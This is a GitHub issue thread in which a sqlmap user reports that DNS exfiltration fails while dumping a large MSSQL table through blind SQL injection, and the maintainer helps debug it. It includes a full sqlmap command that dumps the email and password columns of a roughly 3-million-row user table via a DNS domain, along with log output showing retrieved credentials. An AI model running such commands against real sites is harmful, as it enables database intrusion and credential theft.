### ISSUE TITLE
DNS exfiltration attack

### ISSUE THREAD

**Issue by Comancheroo** [sqlmapproject/sqlmap#1752]
Hi,
I use DNS channels for boolean-based blind. This is very nice work.
DB name, tables and columns names, very good this is very speed response. There is no problem.
But, It gives an error when dumping. (No problem when I don't use to DNS channel but then very slowly)

[WARNING] no proper pivot column provided (with unique values). It won't be possible to retrieve all rows
[WARNING] turning off pre-connect mechanism because of connection time out(s)

and other error;

[ERROR] data retrieval through DNS channel failed. Turning off DNS exfiltration support

Thanks.

**Comment by stamparm** [comment]
Can you please give the whole console output and used options/switches?

**Comment by Comancheroo** [comment]
I find this problem. I've tried other small data table and this not give error and very speed working.
But big data table columns very mix, irregular. So I had to use the --pivot-column.
I use pivot-columns but not work consecutive so efficient doesn't work.

  ID
+----+
| 1  |   
| 10 |
| 11 |
| 12 |
| 13 |
| 14 |
| 15 |
| 16 |
| 17 |
| 18 |
| 19 |
| 2  |
| 20 |
| 21 |
| 22 |
| 23 |
| 24 |
| 25 |
| 26 |
| 27 |
| 28 |
| 29 |
| 3  |
| 30 |
| 31 |
| 32 |
| 4  |
| 5  |
| 6  |
| 7  |
| 8  |
| 9  |
+----+

**Comment by stamparm** [comment]
`I use pivot-columns but not work consecutive so doesn't efficient work.` <- no matter whether the numerical or lexical ordering is used, this should not be a problem.

Also, to me it doesn't seem like you have more than 32 entries in the dump you've attacked (with column `ID`)

p.s. sqlmap is most probably having trouble because you have a HUGE table and the DBMS itself is struggling to serve the sqlmap for every query. For example, in some cases sqlmap has to use `ORDER BY` to make a VALID dump, but DBMS will become really unstable because it will do the ordering for each query

**Comment by Comancheroo** [comment]
Yes I have a huge table. Total : 3 million data but I dump only 2 columns.

[5 entries]
+------------------------------+---------+-------+
| EMail                                    | Password  | RecID |
+-------------------------------------+---------------+-------+
| keyser@hotmail.com            | 12345        | 1     |
| info@abc.com                       | qwerty       | 10    |
| pulpfiction@hotmail.com       | j.travolta    | 100   |
| gotfather@hotmail.com         | v.corleone | 1000  |
| scarface@hotmail.com         | t.montana | 100000  |
+--------------------------------------+--------------+-----------+

**Comment by stamparm** [comment]
So, sqlmap says that there are 3 million records or you are concluding that on the `RecID` values?

**Comment by Comancheroo** [comment]
Yes bro, RecID pivot columns.
My query:
python sqlmap.py -u "https://site.com/News.aspx?gid=123" --random-agent --dbms=mssql --technique=B -D Portal -T User -C RecID,EMail,Password --dump --dns-domain=123.xyz   --dump-format=html --timeout=600  --pivot-column=RecID --flush-session

Results:
[13:47:02] [INFO] fetching entries of column(s) 'EMail, RecID, Password' for table 'User' in database 'Portal'
[13:47:02] [INFO] fetching number of column(s) 'EMail, RecID, Password' entries for table 'User' in database 'Portal'
[13:47:02] [INFO] testing for data retrieval through DNS channel
[13:47:03] [INFO] data retrieval through DNS channel was successful
[13:47:03] [INFO] retrieved: 2995947
[13:47:03] [INFO] using column 'RecID' as a pivot for retrieving row data
[13:47:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:47:35] [INFO] retrieved: 1 <= dns doesnt work.
[13:48:04] [INFO] retrieved: 123456 <= dns working
[13:48:10] [INFO] retrieved: keyser@soze.com  <=dns working
[13:48:40] [INFO] retrieved: 10 <= dns doesnt work.
[13:49:02] [INFO] retrieved: pass123  <= dns working
[13:49:07] [INFO] retrieved: scarface@hotmail.com  <=dns working
...... 100
...... 1000
...... sqlmap distorted.

**Comment by stamparm** [comment]
Not sure how to help/debug this. Can you do the packet capture of such run and send it to miroslav@sqlmap.org?

**Comment by Comancheroo** [comment]
Ok bro, I sent. Thank you.

**Comment by stamparm** [comment]
`MIN(master.dbo.fn_varbintohexstr(` has been used instead of `master.dbo.fn_varbintohexstr(MIN`. In normal circumstances this is not a problem, but in large dumps it is an extra processing layer introducing requirement for more server CPU consumption
